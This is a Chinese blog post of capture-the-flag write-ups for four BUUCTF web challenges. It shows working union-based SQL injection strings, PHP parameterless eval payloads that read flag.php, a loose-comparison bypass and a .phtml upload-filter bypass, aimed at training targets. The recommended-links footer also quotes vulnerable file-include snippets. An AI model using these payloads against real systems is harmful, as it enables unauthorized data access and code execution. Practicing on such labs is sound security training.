Web-9(33-36)-BUUCTF平台

最新推荐文章于 2023-07-31 08:50:00 发布
最新推荐文章于 2023-07-31 08:50:00 发布
阅读量2.7k 收藏 2
点赞数 2
分类专栏: CTF BUUCTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/105452069
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
BUUCTF
19 篇文章 1 订阅
订阅专栏

本篇内容
[GXYCTF2019]BabySQli
[GXYCTF2019]禁止套娃
[ACTF2020 新生赛]BackupFile
[ACTF2020 新生赛]Upload

上一篇 | 目录 | 下一篇

[GXYCTF2019]BabySQli
在这里插入图片描述
BP抓包尝试:
在这里插入图片描述
发现一串奇怪的东西,像是base32加密,尝试base32解码
后再base64解码得到:

select * from user where username = '$name'

尝试一些其他的name发现是wrong user!,而尝试admin是wrong pass!

尝试:

name=1&pw=123					//显示wrong user!
name=1'&pw=123					//报错
name=1'%23&pw=123				//显示wrong user!

name=1' or 1=1 %23&pw=123		//显示do not hack me!,猜测过滤了or

name=1' Order by 4 %23&pw=123	//大小写绕过,显示Error: Unknown column '4' in 'order clause'
name=1' Order by 3 %23&pw=123	//显示wrong user!,说明有3列

name=1' union select 1,2,3 %23&pw=123		//显示wrong user!
name=1' union select 'admin',2,3 %23&pw=123	//显示wrong user!
name=1' union select 1,'admin',3 %23&pw=123	//显示wrong pass!,说明用户在第二列

这里由于回显的机制,没法常规注入爆库、爆表。但是这里却有一点可以利用,就是联合注入时查出来的是我们自己填的值,见下图:
在这里插入图片描述
也就是admin的password会被我们自己填的值所替代,尝试:

name=1' union select 1,'admin',3 %23&pw=3

还是回显的wrong pass!,猜测后台经过md5加密,尝试一下:

name=1' union select 1,'admin','eccbc87e4b5ce2fe28308fd9f2a7baf3' %23&pw=3

这里eccbc87e4b5ce2fe28308fd9f2a7baf3就是3的md5值,拿到最终flag。
在这里插入图片描述




[GXYCTF2019]禁止套娃

在这里插入图片描述
尝试扫目录后发现git泄露,得到index.php源码
在这里插入图片描述

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

以下解释参考大佬文章:[GXYCTF2019]禁止套娃

1.GET一个名为exp的参数。
2.过滤了常用的几个伪协议,不能以伪协议读取文件。
3.(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
4.正则匹配掉了et/na/info等关键字,很多函数都用不了。
5eval($_GET['exp']); 执行exp的内容。

典型的无参数RCE
介绍几个函数方法:

localeconv() 		函数返回一包含本地数字及货币格式信息的数组。
current() 			返回数组中的当前单元, 默认取第一个值。
pos() 			 	current() 的别名。
scandir() 			列出 images 目录中的文件和目录。
readfile() 			输出一个文件。
highlight_file()	打印输出或者返回 filename 文件中语法高亮版本的代码。
show_source()		highlight_file()的别名。
next() 			 	函数将内部指针指向数组中的下一个元素,并输出。
array_reverse() 	以相反的元素顺序返回数组。
array_rand()		从数组中随机取出一个或多个单元。
array_flip()		交换数组中的键和值。
session_id()		获取/设置当前会话IDsession_start()		启动新会话或者重用现有会话。

首先得到当前目录下的文件:

print_r(scandir('.'));

localeconv() 返回一包含本地数字及货币格式信息的数组。而数组的第一项是.,结合localeconv()和current() 就能得到.,所以payload:

print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));

在这里插入图片描述
然后就是读取flag.php的内容了。
方法一
由于flag.php在倒数第二位,结合next()array_reverse(),可以读到flag.php。

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

在这里插入图片描述
使用highlight_file()或readfile()读取flag,注意使用readfile()需要右键源代码才可以看到。
在这里插入图片描述
方法二
结合array_rand()array_flip()多刷新几次网页可以得到flag。

?exp=highlight_file(array_rand(array_flip(scandir(current(localeconv())))));

在这里插入图片描述

方法三
结合session_id()session_start(),然后手动添加名为PHPSESSION的cookie,值为flag.php。

?exp=highlight_file(session_id(session_start()));

在这里插入图片描述




[ACTF2020 新生赛]BackupFile
在这里插入图片描述
尝试了www.zip之类的几种后没有拿到源码,直接dirsearch工具扫,原来是bak备份文件:
在这里插入图片描述
拿到源代码:

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    //key不能为数字
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    //intval()获取$key的整数值
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

GET传一个key,不能为数字,经intval()函数后与$str相等的话就出flag。但是int和string比较会将string转成int再去比较,而$str转成int后就是123,所以key等于123即可满足条件。
在这里插入图片描述




[ACTF2020 新生赛]Upload
在这里插入图片描述
在这里插入图片描述
我本来想抓包看看的,发现还没抓到包就弹窗了,好嘛,猜测前端验证的,直接google插件Quick Javascript Switcher禁用js看看:
在这里插入图片描述
还是不行,禁用js后抓包尝试了php的其他几种写法,发现
phtml可以上传成功。
在这里插入图片描述
在这里插入图片描述
查看根路径下的文件发现flag,读取即可。
在这里插入图片描述
在这里插入图片描述




========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105452069
========================================================

airrudder
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
文件包含漏洞学习
Wawyw's Blog
05-29 619
1、概述 什么是文件包含? 将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。 漏洞产生原因 文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码。 示例: <?php $filename=$_GET['filename']; include($filename); ?> 可以看出,改变URL中filename的值即可改变代码中包含的文件。 PHP中的文件包含函数 include 函数出现错误时,会抛出警告,但程序仍继续执行。 i
PHP md5()函数详解,PHP计算MD5,md5()绕过,md5()漏洞原理剖析
wangyuxiang946的博客
07-31 1万+
md5() 可以计算字符串的「MD5散列值」。计算成功,就返回MD5值;计算失败,就返回false。
文件包含漏洞
huangyongkang666的博客
03-21 2400
文件包含漏洞 1.什么是文件包含 ​ 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 2. 文件包含漏洞原理 ​ 文件包含是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数 (include(),require()和include_once(),requir_once()) 利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令
[UTCTF2020]Curveball(Shamir‘s Secret Sharing)
m0_62506844的博客
04-21 444
(C81E728D9D4C2F636F067F89CC14862C, 31E96A93BF1A7CE1872A3CCDA6E07F86) (ECCBC87E4B5CE2FE28308FD9F2A7BAF3, ADF6E4F1052BDE978344743CCDCF5771) (E4DA3B7FBBCE2345D7772B0674A318D5, 0668FBCFE4098FEA0218163AC21E6531) shamir密钥分享,已知三组数据,md5解密后: (2,5398141) (3,539.
文件包含漏洞详解 一文了解文件包含漏洞
闵行小鱼塘
11-07 1912
本篇总结归纳文件包含漏洞
spring-web-5.1.5.RELEASE.jar
01-08
spring-web-5.1.5.RELEASE.jar
Dashboard-Web-master
12-24
Dashboard-Web-master
web-socket-js
12-19
web-socket-js亲测可用
text-generation-webui-main
最新发布
09-20
多种模型后端: transformers、llama.cpp、ExLlama、AutoGPTQ、GPTQ-for-LaMa、ctransformers
文件包含漏洞学习(3)
yzl_007的博客
09-18 416
文件包含漏洞学习(3) 我们看到这一段代码 <?php $filename = $_GET['filename']; include($filename . ".html"); ?> 这里函数后面又添加了.html为后缀,对于有限制的文件包含漏洞,我们可以通过一些方法来绕过,不过也有先决条件:magic_quotes_gpc = Off php版本<5.3.4 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KIyNvIaW-1631894
文件上传漏洞
qq_46263951的博客
05-15 240
环境下载:https://github.com/c0ny1/upload-labs 通关手册:https://xz.aliyun.com/t/2435 第三关若要成功访问.php3,则需要在Apache中添加语句,也可以添加其它任意扩展名,都执行.php程序 AddType application/x-httpd-php .php .php3 .php5 .php7 ...
WEB漏洞-文件操作
weixin_46544151的博客
04-26 1920
目录 31、文件操作之文件包含漏洞全解 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 ​2.有限制文件包含漏洞 二、远程文件包含代码测试——原理 1.无限制 2.有限制 三、各种协议流提交流测试-协议 四、某CMS程序文件包含利用-黑盒(ekucms) 五、CTF-南邮大学,i春秋百度杯真题-白盒 1.南邮CTF 2.i春秋-CTF 31、文件操作之文件包含漏洞全解 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 在phpstudy根目录下创建inc
文件下载
PurineKing之博客
12-25 121
<? // 要下载的文件名 $filename = $_GET['filename']; // 要下载成啥名字 $filename2 = $_GET['filename2']; // 下载路径 $filedir=$_SERVER['DOCUMENT_ROOT']."/images/logo/"; header('Content-type: application/octet-stream'...
如何利用php下载文件_PHP下载文件函数与用法示例
weixin_35774805的博客
03-09 120
本文实例讲述了PHP下载文件函数与用法。分享给大家供大家参考,具体如下:文件链接链接PHP拼接下载链接//获取文件名 取出单引号 完善文件名$filename = $_GET['filename'];$filename=trim($filename,"''");$filename = $filename.'.zip'; //获取文件名称// header:主机名文件名 下载$host_addr =...
文件上传及文件包含
Jeromeyoung
01-16 1470
文章目录文件包含漏洞测试代码远程文件包含本地文件包含本地包含图片马实例本地包含绕过1、包含漏洞上传技巧(一句话图片马等)2、包含日志文件3、PHP包含读文件4、PHP包含写文件(详解如下)5、包含截断绕过6、str_replace函数绕过(字符拼接)7、fnmatch函数绕过(通过内置协议)PHP内置协议 文件包含漏洞 简介: 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏
PHP漏洞之文件包含漏洞
dogeace的博客
11-28 1670
在php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php的文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值